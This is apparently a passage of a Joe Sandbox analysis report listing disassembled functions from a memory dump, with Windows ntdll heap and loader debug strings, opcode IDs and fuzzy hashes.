                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                • API String ID: 0-3061284088
                                                • Opcode ID: b300d52bb1203329aba3fe4858c1bdf44d69894eb78583f0b305cff6c5deed22
                                                • Instruction ID: bef5b1b7f8db115124ea7325307631781499a99fad5db72681a1ec86461c6fff
                                                • Opcode Fuzzy Hash: b300d52bb1203329aba3fe4858c1bdf44d69894eb78583f0b305cff6c5deed22
                                                • Instruction Fuzzy Hash: 45014776416690EEE629831AD918FA67BF4DB43730F364099F1014BE90CFA8DC88CE71
                                                Function 36D770C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 880f9c06704443edb276b891e3c7b30eca018e949a12485fc342f0ce148d5f29
                                                • Instruction ID: 4b6216b1fe45d92f67debe7423ee5c1644be219d14b79f41a9ee4ccfc0dc1e24
                                                • Opcode Fuzzy Hash: 880f9c06704443edb276b891e3c7b30eca018e949a12485fc342f0ce148d5f29
                                                • Instruction Fuzzy Hash: F013AD74E00355CFEB14CF69C894BA9BBF1BF49304F2485A9D889AB381D734A945CF92
                                                Function 36D6BEC0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$.mui$.mun$SystemResources\
                                                • API String ID: 0-3047833772
                                                • Opcode ID: c30d84678058ba11c21c85181261246ca2c97008b73d7eea84b31b452be02c99
                                                • Instruction ID: 22d5a0500bff17b372cd762224465f56daf929a1073ca4f3420fc987c680a3da
                                                • Opcode Fuzzy Hash: c30d84678058ba11c21c85181261246ca2c97008b73d7eea84b31b452be02c99
                                                • Instruction Fuzzy Hash: 13624D76E003299FDB21CF55CC80BD9B7B8BB0A358F4141EAD409A7A50DB359E85CF92
                                                Function 36D5F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                • API String ID: 0-2586055223
                                                • Opcode ID: 78440297fa16f904d5f7543dcdc6c2e2e45a8510b0c44ca7349051b33bf01c2d
                                                • Instruction ID: 6d3b47a478463f14e171fc47f127f75fa47dccebd31f49dd63ccd2a750e64a41
                                                • Opcode Fuzzy Hash: 78440297fa16f904d5f7543dcdc6c2e2e45a8510b0c44ca7349051b33bf01c2d
                                                • Instruction Fuzzy Hash: 67612176604380AFEB11CF24CC44F6B77E8EF84794F150468FA958B691CB34E845CBA2
                                                Function 36E111A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                • API String ID: 0-336120773
                                                • Opcode ID: 6307c1d70485b2b2f5af3bf4c0cf1f6d7f34a2c2bfa806468cd800cc0c064f3a
                                                • Instruction ID: 16572f799a93a9c44ed7264c74ac6d2269f8ccf927b30c07bfba2a8f48aa1a8d
                                                • Opcode Fuzzy Hash: 6307c1d70485b2b2f5af3bf4c0cf1f6d7f34a2c2bfa806468cd800cc0c064f3a
                                                • Instruction Fuzzy Hash: 8731E179601210EFEB11CB99CC80F9ABBE8EF06768F610155F501DB690EB34EC48EA65
                                                Function 36D59148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                • API String ID: 0-1391187441
                                                • Opcode ID: 0267990ab4c9d89a6fcf8d7e32d46052f69a84201dac4c34dd67ef5a2b4bc855
                                                • Instruction ID: c253c64e0a6e35b6652846d65285c98a45bd44149627874fdcd85a97091609ee
                                                • Opcode Fuzzy Hash: 0267990ab4c9d89a6fcf8d7e32d46052f69a84201dac4c34dd67ef5a2b4bc855
                                                • Instruction Fuzzy Hash: CE31BE36A00254EFDF02CB46CC84F9EBBB8EF45760F2640A5E915AB690DB74ED44CE61
                                                Function 36D67152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: ed2d3dc0a8105dc2f369e226e61dac72fd27ac3daea7e95f6d42582541fe40e3
                                                • Instruction ID: 02f6bccec72b85d60607ebde27d4c815c6b8ce6ca394e5e80fe09bfb4c75327d
                                                • Opcode Fuzzy Hash: ed2d3dc0a8105dc2f369e226e61dac72fd27ac3daea7e95f6d42582541fe40e3
                                                • Instruction Fuzzy Hash: 5C51FD35E10729EFFB05CB65CD58BADBBB4BF04358F60402AE51193290EB789905DBD1
                                                Function 36E33E10 Relevance: 4.6, APIs: 3, Instructions: 148timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 93eb06a58c5aaf5eeb9c1bd33a6d99184759e5bd8585aceff21d738813e1b941
                                                • Instruction ID: d8eca9275627ae753c709754bf413dab0ad32f619b891995ebff4e52425413b7
                                                • Opcode Fuzzy Hash: 93eb06a58c5aaf5eeb9c1bd33a6d99184759e5bd8585aceff21d738813e1b941
                                                • Instruction Fuzzy Hash: 09518A35A01756AFDB05CF65CC84F9ABBB6FF88314F284065E91597790CB30AD14CBA1
                                                Function 36D71F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 1ec9ff8f994316b911fa5a4a21a171e76a310f27126292caa8dba86f992c01be
                                                • Instruction ID: 42b41727f3be2099724a0e911b465463d7735592c0d2b73383faacf458e79718
                                                • Opcode Fuzzy Hash: 1ec9ff8f994316b911fa5a4a21a171e76a310f27126292caa8dba86f992c01be
                                                • Instruction Fuzzy Hash: DF2214B4A00389DFEB05CF26C850B6ABBF5FF05704F248499E585DB281DB35E895CBA1
                                                Function 36D61460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36D61728
                                                • HEAP: , xrefs: 36D61596
                                                • HEAP[%wZ]: , xrefs: 36D61712
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 86862b321b20bb59a892494ec8e02575f7b3530cbd0382d33d3d40e4980fcc59
                                                • Instruction ID: 0869e5d80a756d3bb20cfe0fb3227472e482f2b89afe79559cb70f508c0fb27f
                                                • Opcode Fuzzy Hash: 86862b321b20bb59a892494ec8e02575f7b3530cbd0382d33d3d40e4980fcc59
                                                • Instruction Fuzzy Hash: 24E1EF74A043519FEB15CF6EC891B7ABBF1AF48308F948459E9D6CB285DB34E844CB90
                                                Function 36D6B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                • API String ID: 0-1145731471
                                                • Opcode ID: fa82ca3083be5f47f53fb515d2396e367c87ecf5586277bb84928d3a3804b0eb
                                                • Instruction ID: 62627780cdda25af1859a9e49ac8b5c0c30a7366ad6c24b8bc47e96fee69d17b
                                                • Opcode Fuzzy Hash: fa82ca3083be5f47f53fb515d2396e367c87ecf5586277bb84928d3a3804b0eb
                                                • Instruction Fuzzy Hash: C8B1BC79E147598FEB15CF6AC880F9EB7B2AF44398F654429E851EB784D730E840CB60
                                                Function 36DE368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                • API String ID: 0-2391371766
                                                • Opcode ID: 80c7f827a61bf8423ef1b3393bd6a8fa952c68c8874ad50b884f10938e0af055
                                                • Instruction ID: ead7097f025174bf0ffa17582ac75ee21f451c49b8078eb0600d4677efc85565
                                                • Opcode Fuzzy Hash: 80c7f827a61bf8423ef1b3393bd6a8fa952c68c8874ad50b884f10938e0af055
                                                • Instruction Fuzzy Hash: FCB1E1B1A48341AFE711DF55CC80F6BB7E8FB44754F421929FA40ABA50C774E858CBA2
                                                Function 36DF36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                • API String ID: 0-318774311
                                                • Opcode ID: 3b8f079097c31c2dcc056b7c9c7679ab5839a46012590f61e0da56d37bf7efae
                                                • Instruction ID: da16580ab9003d17ef4fee96eb93c7387bd3aefe7fdc6b57975ec9f9bcf5f224
                                                • Opcode Fuzzy Hash: 3b8f079097c31c2dcc056b7c9c7679ab5839a46012590f61e0da56d37bf7efae
                                                • Instruction Fuzzy Hash: 05818DB5A18340AFE311CF25C840B6AB7E8EF84794F470929F9809B790DB75D904CBA2
                                                Function 36DE7410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                • API String ID: 0-3870751728
                                                • Opcode ID: c54c767c83c6ae0a03f358a82dfa64fda25aaf41db5bf3bb5a5931e555377647
                                                • Instruction ID: 5a05426b0594ca9251e31797d99290ce33637ede138b36b1201926bf6a398cca
                                                • Opcode Fuzzy Hash: c54c767c83c6ae0a03f358a82dfa64fda25aaf41db5bf3bb5a5931e555377647
                                                • Instruction Fuzzy Hash: CE916EB4E002159FEB54CF69C884BADBBF1FF48314F24816AD905AB391E7759841CFA0
                                                Function 36D6B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                • API String ID: 0-373624363
                                                • Opcode ID: 2efb502d3ed1246135cf2a84d2fd1a93098c1a7f0a04ccb69483f92607b52eda
                                                • Instruction ID: f966312074b8d410ce98403a96ab7927840a405cc8f9f8992f55a8e578be1555
                                                • Opcode Fuzzy Hash: 2efb502d3ed1246135cf2a84d2fd1a93098c1a7f0a04ccb69483f92607b52eda
                                                • Instruction Fuzzy Hash: 0A91DEB5E04359CFEB11CF96C880BEE77B0FF05368FA14195E850AB290D7789A91CB91
                                                Function 36D9909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %$&$@
                                                • API String ID: 0-1537733988
                                                • Opcode ID: 9cff8de2d87ea6da05bc5b8efefabadc27e4462ecc68a0d93a6a5f0347a07b92
                                                • Instruction ID: 3b608fbb692239c7b862de5fb208c7d236e996e1f89d543a5715c2cba883f715
                                                • Opcode Fuzzy Hash: 9cff8de2d87ea6da05bc5b8efefabadc27e4462ecc68a0d93a6a5f0347a07b92
                                                • Instruction Fuzzy Hash: 9171D174A083019FE714DF25C980A8BBBE9FF89758F64491DE49A5B290D730D909CBA3
                                                Function 36E3B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                Download Yara Rule
                                                Strings
                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 36E3B82A
                                                • TargetNtPath, xrefs: 36E3B82F
                                                • GlobalizationUserSettings, xrefs: 36E3B834
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                • API String ID: 0-505981995
                                                • Opcode ID: 9575a88f7d9f5596ea0c5c7d95ac858adfff6245be513ce736802d0c5002f1e0
                                                • Instruction ID: 2fcaeb40abc666ca7598dce308baaf6b67c6a969ec0315a6551da6a2d1320a17
                                                • Opcode Fuzzy Hash: 9575a88f7d9f5596ea0c5c7d95ac858adfff6245be513ce736802d0c5002f1e0
                                                • Instruction Fuzzy Hash: D461AE72D02228AFDB21DF55CC88BDAB7B8EF24754F5101E5A509A7250CB74DE88CFA1
                                                Function 36D5F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 36DBE6C6
                                                • HEAP: , xrefs: 36DBE6B3
                                                • HEAP[%wZ]: , xrefs: 36DBE6A6
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                • API String ID: 0-1340214556
                                                • Opcode ID: 9e787b834025073dda109273c2677d9df5f0b6db9d65c11633dc3e586cc38776
                                                • Instruction ID: bcebe3fea5d0fdea06a8b73e9f7981e3c910205e8406b0555c980b49cc43b9fc
                                                • Opcode Fuzzy Hash: 9e787b834025073dda109273c2677d9df5f0b6db9d65c11633dc3e586cc38776
                                                • Instruction Fuzzy Hash: 40510575600744EFEB12CB65C984F9ABBF8FF05344F1104A4E6818FA92D734E904CBA2
                                                Function 36D815F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrmap.c, xrefs: 36DCA59A
                                                • LdrpCompleteMapModule, xrefs: 36DCA590
                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 36DCA589
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                • API String ID: 0-1676968949
                                                • Opcode ID: 324a6f885efd7e2671936bf8d96fb45d141fe32cc4229afd610c1d635b7c15d5
                                                • Instruction ID: d58dc6a8940dd94c1af776294516f7e3e1411bbbd35941d41dbc1d95ff0e8304
                                                • Opcode Fuzzy Hash: 324a6f885efd7e2671936bf8d96fb45d141fe32cc4229afd610c1d635b7c15d5
                                                • Instruction Fuzzy Hash: 56513378A00B4A9BF711CB19CD49B5A7BF4EF00718F1842A4E9909B6E1DB74E804CBC1
                                                Function 36D5758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                • API String ID: 0-1151232445
                                                • Opcode ID: ad7678edd37b018d6fa5331abeaa612f850c219dafe6f302f5588933fe6828ab
                                                • Instruction ID: f5477cc90a2679baf01363cfe5307571c57d06e4b61537a0f01bcfcd72df4506
                                                • Opcode Fuzzy Hash: ad7678edd37b018d6fa5331abeaa612f850c219dafe6f302f5588933fe6828ab
                                                • Instruction Fuzzy Hash: 624117B8A10340CFFF15CB1AC4947A97BE1DF05384F794069E6864FA4ADBB4D489CB91
                                                Function 36D916CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpAllocateTls, xrefs: 36DD1B40
                                                • minkernel\ntdll\ldrtls.c, xrefs: 36DD1B4A
                                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36DD1B39
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                • API String ID: 0-4274184382
                                                • Opcode ID: f429a09d7eaa4b1952f18ff4f6a0b81d64603258e10cf7e2621a8fcf25118fe5
                                                • Instruction ID: d7ba8236b0c14b6fd38b617313226ed21cc3c7dc22e89d4f1b4fa8cbdd8f8cb5
                                                • Opcode Fuzzy Hash: f429a09d7eaa4b1952f18ff4f6a0b81d64603258e10cf7e2621a8fcf25118fe5
                                                • Instruction Fuzzy Hash: 404186B5E01609EFDB15CFAACC40AAEBBF6FF48704F518119E505A7250EB35A805CBA1
                                                Function 36E15180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-964947082
